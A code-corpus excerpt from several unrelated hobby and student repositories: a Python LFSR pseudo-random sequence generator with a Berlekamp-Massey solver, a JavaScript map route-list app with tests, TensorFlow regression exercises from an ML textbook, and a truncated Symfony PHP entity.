mlist.py中将数据放入lsrf中并使用jk触发器处理首先得到255为周期的m序列随后得到无周期的伪随机序列
B_M.py中反解出所使用的本原多项式即它的线性综合解
F_X.py中处理B-M算法中所有fx中的x前面的系数
运行stream-cipher.py根据提示输入 可以得到对应学号以及本元表达式生成的序列以及反解出来得到原本原多项式
<file_sep>/mlist.py
import hashlib
class lfsr_jk:
def __init__(self,st_num,poly):
self.__binmap={'0':'0000','1':'0001','2':'0010','3':'0011','4':'0100','5':'0101','6':'0110','7':'0111',
'8':'1000','9':'1001','a':'1010','b':'1011','c':'1100','d':'1101','e':'1110','f':'1111'}
self.__st_num=st_num
self.__poly=poly
self.__md5_hash=''
self.__list1=[] #使用md5加密后的后3-4位lfsr生成的序列
self.__list2=[] #使用md5加密后的后1-2位lfsr生成的序列
self.__qlist=[] #经过jk触发器处理后的序列
self.__number=512 #生成的序列长度
def __md5(self):
self.__md5_hash=hashlib.md5(self.__st_num.encode('utf-8')).hexdigest()
#print(md5)
for i in [-4,-3]:
for j in range(4):
self.__list1.append(int(self.__binmap[self.__md5_hash[i]][j])) #预存8bit初始状态至list1
for i in [-2,-1]:
for j in range(4):
self.__list2.append(int(self.__binmap[self.__md5_hash[i]][j])) #预存8bit初始状态至list2
def __lfsr(self,list):
for i in range(self.__number):
tmp=0
for j in range(8):
tmp=tmp+self.__poly[j]*list[i+j]
#print(poly[j],list1[i+j])
tmp=tmp%2
#print(tmp)
list.append(tmp)
def __check(self,num):
"""
取反
"""
if num==0:
return 1
else:
return 0
def __jk(self,list1,list2):
"""
模拟jk触发器
"""
self.__qlist.append(0)
for i in range(self.__number):
qn=list1[i]*self.__check(self.__qlist[i])+self.__check(list2[i])*self.__qlist[i]
qn=qn%2
self.__qlist.append(qn)
def run(self):
"""
运行
"""
self.__md5()
self.__lfsr(self.__list1)
self.__lfsr(self.__list2)
self.__jk(self.__list1,self.__list2)
def get_md5(self):
"""
返回md5的hash值
"""
return self.__md5_hash
def get_list1(self):
"""
返回list1
"""
return self.__list1
def get_list2(self):
"""
返回list2
"""
return self.__list2
def get_qlist(self):
"""
返回qlist
"""
return self.__qlist
def get_total(self):
"""
返回序列长度
"""
return self.__number
<file_sep>/info.py
class get_info:
def __init__(self):
self.__polynomial=[[1,0,0,0,1,1,1,0,1],
[1,0,0,1,0,1,0,1,1],
[1,0,0,1,0,1,1,0,1],
[1,0,1,0,0,1,1,0,1],
[1,0,1,0,1,1,1,1,1],
[1,0,1,1,0,0,0,1,1],
[1,0,1,1,0,0,1,0,1],
[1,0,1,1,0,1,0,0,1],
[1,0,1,1,1,0,0,0,1],
[1,1,0,0,0,0,1,1,1],
[1,1,0,0,0,1,1,0,1],
[1,1,0,1,0,1,0,0,1],
[1,1,1,0,0,0,0,1,1],
[1,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,1],
[1,1,1,1,1,0,1,0,1]]
self.__get_st_num()
self.__get_poly()
def __get_st_num(self):
"""
确定学号
"""
choice=input("当前学号:161520322\n是否使用预设学号?(Y/N) ")
while True:
if choice.capitalize()=='N':
self.__st_num=input("请输入你的学号? ")
break
elif choice.capitalize()=='Y':
self.__st_num="161520322"
break
else:
choice=input("输入有误!请重新输入:")
def __get_poly(self):
"""
确定使用的本原多项式
"""
print("GF(8)中的本原多项式有:\n(格式为:f(x)=cnx^8+(cn-1)x^7...+c2x^2+c1x+1)")
num=0
for list in self.__polynomial:
print(num,list)
num=num+1
flag=False
while flag==False:
try:
choice=eval(input("请输入选择的本原多项式序号:"))
except NameError:
"""
用户输入了非数字
"""
print("请输入一个数字!\n")
except:
print("Unexcepted Error Occured!\n")
else:
try:
self.__poly=self.__polynomial[choice]
except IndexError:
"""
用户输入的地址越界
"""
print("请输入一个0-15的数字!\n")
except:
print("Unexcepted Error Occured!\n")
else:
flag=True
def re_st_num(self):
"""
返回学号
"""
return self.__st_num
def re_poly(self):
"""
返回本原多项式系数
"""
return self.__poly
<file_sep>/F_x.py
from copy import deepcopy
class func:
def __init__(self,list):
self.maxlen=16
self.flist=[]
for i in range(self.maxlen):
if i<len(list):
self.flist.append(list[i])
else:
self.flist.append(0)
@classmethod
def fx_add(cls,fx1,fx2):
tlist=[]
maxlen=16
for i in range(maxlen):
tlist.append(fx1.flist[i]+fx2.flist[i])
return func(tlist)
@classmethod
def fx_multiply(cls,fx1,fx2):
tlist=[]
maxlen=16
if fx1.flist[0]!=0:
for i in range(maxlen):
tlist.append(fx2.flist[i]*fx1.flist[0])
return func(tlist)
else:
for i in range(1,maxlen):
tlist=deepcopy(fx2.flist)
if fx1.flist[i]!=0:
try:
for j in range(maxlen):
if tlist[maxlen-1-j]!=0:
tlist[maxlen-1-j+i]=tlist[maxlen-1-j]
tlist[maxlen-1-j]=0
for j in range(i):
tlist[j]=0
except IndexError:
print("Error Occured!\n")
except:
print("Unexcept Error Occured!\n")
break
return func(tlist)
@classmethod
def fx_copy(cls,fx1):
return func(fx1.flist)
def get_flist(self):
"""
获得自身函数系数序列
"""
return self.flist
<file_sep>/B_M.py
from F_x import func
class solve:
def __init__(self,list):
self.__list=list
self.__result=[]
def figure_out(self):
"""
反解出线性综合解
"""
a=[] #序列an
d=[] #序列dn
l=[] #序列ln
fx=[] #序列函数fn(x)
#初始化B-M算法中所有用到的序列
for element in self.__list:
a.append(element)
d.append(0)
l.append(0)
fx.append(None)
l.append(0)
fx.append(None)
#找到第一个an!=0
for index in range(len(a)):
if a[index]!=0:
d[index]=1
l[index+1]=index+1
for i in range(1,index+1):
fx[i]=func([1])
templist=[]
templist.append(1)
for i in range(1,index+1):
templist.append(0)
templist.append(-1)
fx[index+1]=func(templist)
break
#开始迭代
#求dn
for n in range(index+1,len(a)):
for i in range(n+1):
d[n]=d[n]+a[i]*fx[n].flist[n-i]
d[n]=d[n]%2
#print(n)
#print(a[i],fx[n].flist[n-i])
#求m
for i in range(1,n+1):
if l[n-i]<l[n]:
m=n-i
break
#print(m)
if d[n]!=0:
#求f(n+1)x
tlist=[]
for i in range(16):
tlist.append(0)
tlist[n-m]=1
fx[n+1]=func.fx_add(fx[n],func.fx_multiply(func([d[n],]),func.fx_multiply(func([1/d[m],]),func.fx_multiply(func(tlist),fx[m]))))
l[n+1]=max(l[n],n+1-l[n])
else:
fx[n+1]=func.fx_copy(fx[n])
l[n+1]=l[n]
self.__result=fx[16].flist
#print("an序列为: ",a)
#print("dn序列为: ",d[:16])
#print("ln序列为: ",l[:16])
def get_result(self):
"""
得到所求得的线性综合解
"""
return self.__result
| 1506bdb6d0a028960b015fa8cfe05f2919356c84 | [
"Markdown",
"Python"
] | 6 | Python | D0ub1ePieR/Pseudo-randomSequenceGenerationByLsrf | d342bcc3fccf1929b67b03933918987fd95b7076 | da6a3c50a69e320706e67d5dc38dcbaf4473384d |
refs/heads/master | <repo_name>alexbol903/FunBoxTest<file_sep>/src/js/tests/Model.test.js
import { expect } from 'chai';
import List from '../Model';
const createList = addItems => {
const newList = new List();
let i = 1;
while (i <= addItems) {
newList.addItem(`New text ${i}`, i);
i++;
}
return newList;
}
describe('Model: add new 5 item', () => {
const list = createList(5);
it('List length should be 5', () => {
expect(list.items).to.have.lengthOf(5);
});
it('Item 2 - id should be string', () => {
expect(list.items[ 1 ].id).to.be.a('string');
});
it('Item 2 - text should be string and equal New text 2', () => {
expect(list.items[ 1 ].text).to.be.a('string').to.equal('New text 2')
});
it('Item 2 - count should be number and equal 2', () => {
expect(list.items[ 1 ].count).to.be.a('number').to.equal(2);
});
it('Item 2 - readyToMove should be false', () => {
expect(list.items[ 1 ].readyToMove).to.be.false;
});
});
describe('Model: List have 4 Items after delete the Item 3', () => {
const list = createList(5);
before(() => {
list.deleteItem(list.items[ 2 ].id);
});
it('List length should be 4', () => {
expect(list.items).to.have.lengthOf(4);
});
it('Item 2 text should be New text 2', () => {
expect(list.items[ 1 ].text).to.equal('New text 2');
});
it('Item 2 count should be 2', () => {
expect(list.items[ 1 ].count).to.equal(2);
});
it('Item 3 text should be New text 4', () => {
expect(list.items[ 2 ].text).to.equal('New text 4');
});
it('Item 3 count should be 3', () => {
expect(list.items[ 2 ].count).to.equal(3);
});
it('Last Item text should be New text 5', () => {
expect(list.items[ 3 ].text).to.equal('New text 5');
});
it('Last Item count should be 4', () => {
expect(list.items[ 3 ].count).to.equal(4);
});
});
describe('Model: Move Item 2 to Up on 1 step', () => {
const list = createList(3);
before(() => {
list.moveUp(list.items[ 1 ].id);
});
it('Item 1 text should be a New text 2 and count equal 1', () => {
expect(list.items[ 0 ]).to.have.property('text', 'New text 2');
expect(list.items[ 0 ]).to.have.property('count', 1);
});
it('Item 2 text should be a New text 1 and count equal 2', () => {
expect(list.items[ 1 ]).to.have.property('text', 'New text 1');
expect(list.items[ 1 ]).to.have.property('count', 2);
});
it('Item 3 text should be a New text 3 and count equal 3', () => {
expect(list.items[ 2 ]).to.have.property('text', 'New text 3');
expect(list.items[ 2 ]).to.have.property('count', 3);
});
});
describe('Model: Move Item 1 to Down on 1 step', () => {
const list = createList(3);
before(() => {
list.moveDown(list.items[ 0 ].id);
});
it('Item 1 text should be a New text 2 and count equal 1', () => {
expect(list.items[ 0 ]).to.have.property('text', 'New text 2');
expect(list.items[ 0 ]).to.have.property('count', 1);
});
it('Item 2 text should be a New text 1 and count equal 2', () => {
expect(list.items[ 1 ]).to.have.property('text', 'New text 1');
expect(list.items[ 1 ]).to.have.property('count', 2);
});
it('Item 3 text should be a New text 3 and count equal 3', () => {
expect(list.items[ 2 ]).to.have.property('text', 'New text 3');
expect(list.items[ 2 ]).to.have.property('count', 3);
});
});
<file_sep>/src/js/Controller.js
import List from './Model';
import * as View from './View';
const state = {};
/**
* MAP CONTROLLER
*/
const controlMap = async () => {
try {
View.loader.renderLoader();
await ymaps.ready(View.init);
setTimeout(() => {
View.loader.clearLoader();
View.elements.pointsButton.disabled = false;
}, 500);
} catch (error) {
alert(error);
}
};
controlMap();
/**
* LIST CONTROLLER
*/
const controlList = () => {
if (!state.list) state.list = new List();
const text = View.elements.inputText.value;
const count = state.list.items.length + 1;
const reg = /\S/;
if (!text.match(reg)) return;
const item = state.list.addItem(text, count);
View.renderItem(item);
View.addSlideClass(item.id);
return { element: View.searchItem(item.id), item: item };
};
const uptateList = () => {
state.list.items.forEach((el, i) => {
const itemsCount = View.updateItemsCount();
itemsCount[ i ].textContent = el.count;
});
updatePointMap();
};
/**
* ITEMS CONTROLLER
*/
const addItem = () => {
const list = controlList();
if (!list) return;
View.clearInput();
View.elements.inputText.focus();
addPointMap(list.item);
addScrollItem(list.element);
};
const deleteItem = event => {
const btnDel = event.target.closest('.item__button--delete');
if (!btnDel) return;
const id = event.target.closest('.item').dataset.itemid;
state.list.deleteItem(id);
const time = View.deleteItem(id);
setTimeout(() => {
deletePointMap(id);
uptateList();
if (!state.list.items.length) delete state.list;
}, time);
};
/**
* MOVE CONTROLLER
*/
// Element ready to move
const mouseDownItem = event => {
if (event.which != 1 && !shiftKeyCode(event)) return;
const item = event.target.closest('.item');
const btnDel = event.target.closest('.item__button--delete');
if (!item || btnDel) return;
state.element = {};
state.element.item = item;
state.element.coordItem = View.getCoords(item);
state.element.posY = event.pageY - state.element.coordItem.top;
item.readyToMove = true;
View.addBackgroundItem(item);
item.focus();
if (!shiftKeyCode(event)) {
document.onmouseup = mouseUpItem;
View.elements.itemsList.onmousemove = mouseMoveItem;
}
};
// Element don't readyness to move
const mouseUpItem = event => {
if (!state.element.item) return;
const item = state.element.item;
item.readyToMove = false;
View.removeBackgroundItem(item);
View.stopMoveMouse(state.element.item);
if (state.element.clone) {
View.deleteClone(state.element.clone);
item.focus();
}
if (!shiftKeyCode(event)) {
document.onmouseup = null;
View.elements.itemsList.onmousemove = null;
}
delete state.element;
};
const mouseMoveItem = event => {
const item = state.element.item;
if (!state.element.clone) createCloneItem(item);
const clone = state.element.clone;
const coordList = View.getCoords(View.elements.itemsList);
const value = event.pageY - state.element.posY - coordList.top;
View.startMoveMouse(state.element.clone, value);
const coordClone = View.getCoords(clone);
const coordItem = View.getCoords(item);
if (coordClone.bottom < coordItem.top) {
moveItemUp(item);
} else if (coordClone.top > coordItem.bottom) {
moveItemDown(item);
}
clone.textContent = item.textContent;
moveScrollItem(event.clientY, value);
};
const createCloneItem = item => {
const clone = item.cloneNode(true);
state.element.clone = clone;
item.style.visibility = 'hidden';
item.parentElement.appendChild(clone);
clone.style.width = state.element.coordItem.width + 'px';
clone.style.userSelect = 'none';
clone.style.position = 'absolute';
};
const onKeydownItem = event => {
const item = state.element.item;
if (!(item && item.readyToMove)) return;
if (event.keyCode === 38) {
moveItemUp(item);
} else if (event.keyCode === 40) {
moveItemDown(item);
}
};
const moveItemUp = item => {
const previousItem = item.previousElementSibling;
if (previousItem) {
state.list.moveUp(item.dataset.itemid);
item.parentElement.insertBefore(item, previousItem).focus();
uptateList();
}
};
const moveItemDown = item => {
const nextItem = item.nextElementSibling;
if (nextItem) {
item.parentElement.insertBefore(item, nextItem.nextElementSibling).focus();
} else {
item.parentElement.insertBefore(item, null).focus();
}
state.list.moveDown(item.dataset.itemid);
uptateList();
};
/**
* SCROLL CONTROLLER
*/
const addScrollItem = item => {
if (!item) return;
const coordItem = item.getBoundingClientRect();
const listBoxHeight = View.elements.itemsListBox.clientHeight;
const listHeight = View.elements.itemsList.clientHeight;
if (listBoxHeight === listHeight) return;
View.elements.itemsListBox.scrollTop += coordItem.height + 15;
};
const moveScrollItem = clientY => {
if (!clientY) return;
const listBoxTop = View.elements.itemsListBox.offsetTop;
const listBoxBottom =
View.elements.itemsListBox.offsetTop +
View.elements.itemsListBox.clientHeight;
const percentOfListHeight = listBoxBottom * 0.2;
const step = 7;
if (clientY < listBoxTop + percentOfListHeight) {
View.elements.itemsListBox.scrollTop -= step;
} else if (clientY > listBoxBottom - percentOfListHeight) {
View.elements.itemsListBox.scrollTop += step;
}
};
/**
* POINTS
*/
const addPointMap = item => {
if (!state.pointCollection) {
const geoCollection = View.createCollectionMap();
state.pointCollection = geoCollection;
}
const newPoint = View.addPointMap(item);
const geoObjects = View.elements.map.geoObjects;
state.pointCollection.add(newPoint);
if (state.pointCollection.getLength() > 1) {
updateLineStringCoords();
}
geoObjects.add(state.pointCollection);
newPoint.events.add('dragend', updatePointMap);
};
const updateLineStringCoords = () => {
const geoObjects = View.elements.map.geoObjects;
geoObjects.remove(state.LineString);
const lineString = View.addLineStringMap(getCoordsPoints());
state.LineString = lineString;
geoObjects.add(state.LineString)
};
const getCoordsPoints = () => {
const coords = [];
state.pointCollection.each(el => {
coords.push(el.geometry.getCoordinates());
});
return coords;
};
const deletePointMap = id => {
const pointCollection = state.pointCollection;
pointCollection.each(el => {
if (el.id === id) pointCollection.remove(el)
});
updateLineStringCoords();
if (!pointCollection.getLength()) delete state.pointCollection;
};
const updatePointMap = () => {
if (!state.pointCollection) return;
const pointCollection = state.pointCollection;
const listItems = state.list.items;
let address;
pointCollection.each(async (el, index) => {
el.id = listItems[index].id;
el.properties.set('iconContent', listItems[ index ].count);
address = await getAddressPoint(el, index);
el.properties.set('balloonContent', View.setBalloonContent(listItems[ index ].text, address));
pointCollection.add(el, index);
});
updateLineStringCoords();
};
const getAddressPoint = async (el, index) => {
const point = el;
let address;
const coords = point.geometry.getCoordinates();
await ymaps.geocode(coords, { kind: 'house', results: state.pointCollection.getLength()}).then(res => {
const firstGeoObject = res.geoObjects.get(index);
address = firstGeoObject.getAddressLine();
});
return address;
};
/**
* EVENTS
*/
View.elements.pointsButton.onclick = addItem;
View.elements.pointBox.addEventListener('keydown', event => {
if (event.keyCode !== 13) return;
addItem(event);
});
View.elements.itemsList.onclick = deleteItem;
View.elements.itemsList.onmousedown = mouseDownItem;
View.elements.itemsList.onkeydown = event => {
if (shiftKeyCode(event)) {
mouseDownItem(event);
} else if (event.keyCode === 38 || event.keyCode === 40) {
onKeydownItem(event);
}
};
View.elements.itemsList.onkeyup = event => {
if (!shiftKeyCode(event)) return;
mouseUpItem(event);
};
const shiftKeyCode = event => event.keyCode === 16;
<file_sep>/src/js/Model.js
import uniqid from 'uniqid';
export default class List {
constructor() {
this.items = [];
}
addItem(text, count) {
const item = {
id: uniqid(),
text: text,
count,
readyToMove: false,
};
this.items.push(item);
return item;
}
deleteItem(id) {
const index = this.getIndex(id);
this.items.splice(index, 1);
this.updateItems(index);
}
updateItems(startIndex, endIndex = this.items.length) {
let item;
for (let i = startIndex; i < endIndex; i++) {
item = this.items[i];
item.count = i + 1;
item.text = item.text;
}
}
moveUp(id) {
const index = this.getIndex(id);
if (index !== 0) {
const item = this.items[index];
const itemAbove = this.items[index - 1];
this.items.splice(index - 1, 1, item);
this.items.splice(index, 1, itemAbove);
this.updateItems(index - 1, index + 1);
}
}
moveDown(id) {
const index = this.getIndex(id);
if (index !== this.items.length - 1) {
const item = this.items[index];
const itemBelow = this.items[index + 1];
this.items.splice(index + 1, 1, item);
this.items.splice(index, 1, itemBelow);
this.updateItems(index, index + 2);
}
}
getIndex(id) {
return this.items.findIndex(el => el.id === id);
}
}
<file_sep>/src/js/View.js
export const elements = {
map,
rightColumn: document.querySelector('.column--right'),
pointBox: document.querySelector('.points__input-box'),
inputText: document.querySelector('.points__input'),
pointsButton: document.querySelector('.points__button'),
itemsList: document.querySelector('.points__items-list'),
itemsListBox: document.querySelector('.points__items-list-box')
};
/*
* LOADER
*/
export const elementString = {
loader: 'sk-double-bounce'
};
export const loader = {
element: `<div class='${elementString.loader}'>
<div class='sk-child sk-double-bounce-1'></div>
<div class='sk-child sk-double-bounce-2'></div>
</div>`,
renderLoader() {
elements.rightColumn.insertAdjacentHTML('afterbegin', this.element);
},
clearLoader() {
const loader = document.querySelector(`.${elementString.loader}`);
loader.parentElement.removeChild(loader);
}
};
/*
* MAP
*/
const startCoords = [ 53.354174, 83.777556 ];
export const init = () => {
elements.map = new ymaps.Map('map', {
center: startCoords,
zoom: 16,
controls: [ 'zoomControl', 'fullscreenControl' ]
});
};
/*
* POINTS
*/
export const createCollectionMap = () => {
const collection = new ymaps.GeoObjectCollection({}, {
preset: 'islands#blackStretchyIcon',
});
return collection;
};
export const addPointMap = item => {
const newPoint = new ymaps.Placemark(
startCoords,
{
iconContent: `${item.count}`,
balloonContent: setBalloonContent(item.text)
},
{
draggable: true
}
);
newPoint.id = item.id;
return newPoint;
};
export const addLineStringMap = coords => {
const lineString = new ymaps.GeoObject({
geometry: {
type: 'LineString',
coordinates: coords
}
}, {
draggable: false,
strokeColor: '#297acc',
strokeWidth: 5
});
return lineString;
};
export const setBalloonContent = (text, address = 'Адрес не найден...') => {
const balloonContent = `
<p class="balloon-content__text">${text}</p>
<p class="balloon-content__address">${address}</p>`;
return balloonContent;
};
/*
* ITEMS
*/
export const renderItem = item => {
const markup = `
<div class="item" data-itemid=${item.id} tabindex="0">
<p class="item__text"><span class="item__count">${item.count}</span> - ${
item.text
}</p>
<button
type="button"
id="itemDelete"
class="item__button--delete"
disabled="true"
>
<svg
class="button-cross"
width="100%"
height="100%"
viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg"
>
<circle cx="50" cy="50" r="40" />
<line x1="35" y1="65" x2="65" y2="35" />
<line x1="35" y1="35" x2="65" y2="65" />
</svg>
</button>
</div>`;
elements.itemsList.insertAdjacentHTML('beforeend', markup);
};
export const addSlideClass = id => {
const item = searchItem(id);
if (!item) return;
item.classList.add('slide-up');
const time = durationTime(item);
setTimeout(() => {
item.classList.remove('slide-up');
}, time);
};
export const deleteItem = id => {
const item = searchItem(id);
if (!item) return;
item.classList.add('zoom-in');
const time = durationTime(item);
setTimeout(() => {
item.parentElement.removeChild(item);
}, time);
return time
};
export const updateItemsCount = () => {
const itemsCount = document.querySelectorAll('.item__count');
return itemsCount;
};
export const searchItem = id => document.querySelector(`[data-itemid=${id}]`);
export const clearInput = () => {
elements.inputText.value = '';
};
// MOVE ITEM
export const addBackgroundItem = item => {
item.classList.add('item--active');
};
export const removeBackgroundItem = item => {
item.classList.remove('item--active');
};
export const startMoveMouse = (item, value) => {
item.style.top = `${value}px`;
};
export const stopMoveMouse = item => {
item.removeAttribute('style');
};
export const deleteClone = clone => {
clone.parentElement.removeChild(clone);
};
export const getCoords = item => {
const el = item.getBoundingClientRect();
return {
top: el.top + pageYOffset,
bottom: el.bottom + pageYOffset,
height: el.height,
width: el.width
};
};
const durationTime = item =>
parseFloat(window.getComputedStyle(item, null).animationDuration) * 1000;
| c1824dced2d35318255c9b563664c9f493afd946 | [
"JavaScript"
] | 4 | JavaScript | alexbol903/FunBoxTest | 61b38423dac22d2551aae3db3c1c45e8eaab2ab4 | 92f6bfb86c5a3ed3035c19e77c958b31da3bb709 |
refs/heads/main | <repo_name>diasirish/hands_on_ML_book_O-Reilly<file_sep>/README.md
# Hands on ML book by O-Reilly
In this project I will go over O'Reilly's book Hands-on Machine Learning with Scikit-Learn and TensorFlow. This project will contain main examples for the book along with the answers for the questions in the end of the chapters
~ please note that my comments and details about this project will be discussed mainly in Russian. Hence might be unaplicable for non-russina speakers. Sorry :)
<file_sep>/chapter_9/7_пространство_имен.py
# Расчет идет по классической линейной регрессии
# установка всех нужных пакетов
import sklearn
import tensorflow as tf
import numpy as np
from sklearn.datasets import fetch_california_housing
from datetime import datetime
# создаем отметки времени для журнального каталога
now = datetime.utcnow().strftime("%Y%m%d%H%M%S")
root_logdir = "tf_logs"
logdir = "{}/run-{}/".format(root_logdir, now)
# загрузка нужных данных с которыми мы будем работать
housing = fetch_california_housing()
m, n = housing.data.shape
housing_data_plus_bias = np.c_[np.ones((m,1)), housing.data]
# для скорости градиентного вычесления мы стандартизируем данные
scaled_housing_data_plus_bias = sklearn.preprocessing.scale(housing_data_plus_bias, axis=0)
### СТАДИЯ ПОСТРОЕНИЯ ####
# задаем параметры к обучению
n_epochs = 1000
learning_rate = 0.01
#определяем X и y для создания мини-пакетного градиентного спуска
#создание узлов-заполнителей
X = tf.placeholder(tf.float32, shape=(None, n+1), name="X")
y = tf.placeholder(tf.float32, shape=(None,1), name="y")
#определяем размер пакета и подсчитываем количество пакетов
batch_size = 100
n_batches = int(np.ceil(m/batch_size))
# выгрузка данных с диска (Не в книге, стырил с https://github.com/ageron/handson-ml/blob/master/09_up_and_running_with_tensorflow.ipynb)
def fetch_batch(epoch, batch_index, batch_size):
np.random.seed(epoch * n_batches + batch_index)
indices = np.random.randint(m, size=batch_size)
X_batch = scaled_housing_data_plus_bias[indices]
y_batch = housing.target.reshape(-1, 1)[indices]
return X_batch, y_batch
#создаем переменную VARIABLE theta которую будем усовершенствовать
#насколько я понимаю по созданию theta как varible наши оптимизаторы
#будут знать, что нужно делать градиентный спуск именно по theta
theta = tf.Variable(tf.random_uniform([n+1,1], -1.0, -1.0),\
name='theta')
# y_hat=X*theta
y_pred = tf.matmul(X, theta, name='predictions')
# ошибка и ошибка mse с функцией reduce_mean
error = y_pred-y
mse = tf.reduce_mean(tf.square(error), name = 'mse')
# Либо еще проще, используем оптимизатор
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
training_op = optimizer.minimize(mse)
# эта функция создает нам все переменные заданные выше
init = tf.global_variables_initializer()
# создаем узел saver
saver = tf.train.Saver()
#создание узла сводки (summary) или двоичного журнала для TensorBoard
mse_summary = tf.summary.scalar('MSE', mse)
file_writer = tf.summary.FileWriter(logdir, tf.get_default_graph())
### СТАДИЯ ВЫПОЛНЕНИЯ ###
# создаем сессию внутри блока with (не нужно sess.close())
with tf.Session() as sess:
# действительная инициализация всех переменных
sess.run(init)
# 1000 раз запускаем узел training_op
for epoch in range(n_epochs):
for batch_index in range(n_batches):
X_batch, y_batch = fetch_batch(epoch, batch_index, batch_size)
# чек-поинт, на каждой 100 эпохе создаем
#if epoch % 100 == 0:
# сохраняем сеанс и модель
# save_path = saver.save(sess, "/tmp/my_model.ckpt")
# print("Эпоха", epoch, "MSE =", mse.eval())
# чек-поинт, на каждой 10ой эпохе
if epoch % 10 == 0:
summary_str = mse_summary.eval(feed_dict = {X: X_batch, y: y_batch})
step = epoch * n_batches + batch_index
file_writer.add_summary(summary_str, step)
# тут мы гоняем mse по плоскости, пытаясь найти min
# и вставляем X_batch в placeholder X через параметер feed_dict
sess.run(training_op, feed_dict = {X: X_batch, y: y_batch})
# сохроняем лучшее значение и нашу модель
best_theta = theta.eval()
save_path = saver.save(sess, "/tmp/my_model_final.ckpt")
print(best_theta)
file_writer.close()
### ЗАГРУЗКИ ###
# ~~~~ загружаем предыдущую модель вызывая метод restore объекта Saver
#with tf.Session() as sess:
# saver.restore(sess, "tmp/my_model_final.ckpt")
# ...
# ~~~ использование meta файла для загрузки всей архитектуры графа без надобности
# ~~~ базового кода
#saver = tf.train.import_meta_graph("/tmp/my_model_final.ckpt.meta")
#with tf.Session() as sess:
# saver.restore(sess, "/tmp/my_model_final.ckpt")
# ...
### TENSOR BOARD ###
# как запустить tensorboard с terminal
# $ tensorboard --logdir tf_logs/
<file_sep>/chapter_9/2_расчет_градиента_вручную.py
# Расчет идет по классической линейной регрессии
import sklearn
import tensorflow as tf
import numpy as np
from sklearn.datasets import fetch_california_housing
housing = fetch_california_housing()
m, n = housing.data.shape
housing_data_plus_bias = np.c_[np.ones((m,1)), housing.data]
scaled_housing_data_plus_bias = sklearn.preprocessing.scale(housing_data_plus_bias, axis=0)
n_epochs = 1000
learning_rate = 0.01
X = tf.constant(scaled_housing_data_plus_bias, \
dtype=tf.float32, name='X')
y = tf.constant(housing.target.reshape(-1,1), \
dtype=tf.float32, name='y')
theta = tf.Variable(tf.random_uniform([n+1,1], -1.0, -1.0),\
name='theta')
y_pred = tf.matmul(X, theta, name='predictions')
error = y_pred-y
mse = tf.reduce_mean(tf.square(error), name = 'mse')
gradients = 2/m*tf.matmul(tf.transpose(X), error)
training_op = tf.assign(theta, theta - learning_rate*gradients)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for epoch in range(n_epochs):
if epoch % 100 == 0:
print("Эпоха", epoch, "MSE =", mse.eval())
sess.run(training_op)
best_theta = theta.eval()
#print(best_theta) | 5500769e1c651d2012739db37586268574185751 | [
"Markdown",
"Python"
] | 3 | Markdown | diasirish/hands_on_ML_book_O-Reilly | 5f3c8b34cc7a8f3ca3f6755148b87f0602d399d9 | 6cbc315c25b8b7739acb1564f4246ecdcd3cec41 |
refs/heads/master | <repo_name>AnaisVandenDriessche/MRSPORT<file_sep>/mrsport/src/MrsportBundle/Entity/Club.php
<?php
namespace MrsportBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* club
*
* @ORM\Table(name="mrs_club")
* @ORM\Entity(repositoryClass="MrsportBundle\Repository\clubRepository")
*/
class Club
{
/**
* @var int
*
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="AUTO")
*/
private $id;
/**
* @var string
*
* @ORM\Column(name="name", type="string")
*/
private $name;
/**
* @var string
*
* @ORM\Column(name="president", type="string")
*/
private $president;
/**
* @var string
*
* @ORM\Column(name="entraineur", type="string")
*/
private $entraineur;
/**
* @var string
*
* @ORM\Column(name="fondation", type="date")
*/
private $fondation;
/**
* @var string
*
* @ORM\Column(name="couleur", type="string")
*/
private $couleur;
/**
* @var string
*
* @ORM\Column(name="stade", type="string")
*/
private $stade;
/**
* @var string
*
* @ORM\Column(name="siteweb", type="string")
*/
private $siteweb;
/**
* @var string
*
* @ORM\Column(name="telephone", type="string", length=50,nullable=true)
*/
private $telephone;
/**
* @var string
*
* @ORM\Column(name="email", type="string", length= 100,nullable=true)
*/
private $email;
/**
* @var status
*
* @ORM\Column(name="status", columnDefinition="ENUM('valide','invalide','new')")
*/
private $status;
/**
* @ORM\ManyToOne(targetEntity="MrsportBundle\Entity\Sports")
* @ORM\JoinColumn(nullable=true)
*/
private $sports;
public function __construct()
{
//$this->sports = new ArrayCollection();
}
/**
* Get id.
*
* @return int
*/
public function getId()
{
return $this->id;
}
/**
* Set name.
*
* @param string $name
*
* @return club
*/
public function setName($name)
{
$this->name = $name;
return $this;
}
/**
* Get name.
*
* @return string
*/
public function getName()
{
return $this->name;
}
/**
* Set president.
*
* @param string $president
*
* @return club
*/
public function setPresident($president)
{
$this->president = $president;
return $this;
}
/**
* Get president.
*
* @return string
*/
public function getPresident()
{
return $this->president;
}
/**
* Set entraineur.
*
* @param string $entraineur
*
* @return club
*/
public function setEntraineur($entraineur)
{
$this->entraineur = $entraineur;
return $this;
}
/**
* Get entraineur.
*
* @return string
*/
public function getEntraineur()
{
return $this->entraineur;
}
/**
* Set fondation.
*
* @param \year $fondation
*
* @return club
*/
public function setFondation($fondation)
{
$this->fondation = $fondation;
return $this;
}
/**
* Get fondation.
*
* @return \year
*/
public function getFondation()
{
return $this->fondation;
}
/**
* Set couleur.
*
* @param string $couleur
*
* @return club
*/
public function setCouleur($couleur)
{
$this->couleur = $couleur;
return $this;
}
/**
* Get couleur.
*
* @return string
*/
public function getCouleur()
{
return $this->couleur;
}
/**
* Set stade.
*
* @param string $stade
*
* @return club
*/
public function setStade($stade)
{
$this->stade = $stade;
return $this;
}
/**
* Get stade.
*
* @return string
*/
public function getStade()
{
return $this->stade;
}
/**
* Set siteweb.
*
* @param string $siteweb
*
* @return club
*/
public function setSiteweb($siteweb)
{
$this->siteweb = $siteweb;
return $this;
}
/**
* Get siteweb.
*
* @return string
*/
public function getSiteweb()
{
return $this->siteweb;
}
/**
* Set sports.
*
* @param \MrsportBundle\Entity\Sports $sports
*
* @return club
*/
public function setSports(\MrsportBundle\Entity\Sports $sports)
{
$this->sports = $sports;
return $this;
}
/**
* Get sports.
*
* @return \MrsportBundle\Entity\Sports
*/
public function getSports()
{
return $this->sports;
}
/**
* Set status.
*
* @param string $status
*
* @return Club
*/
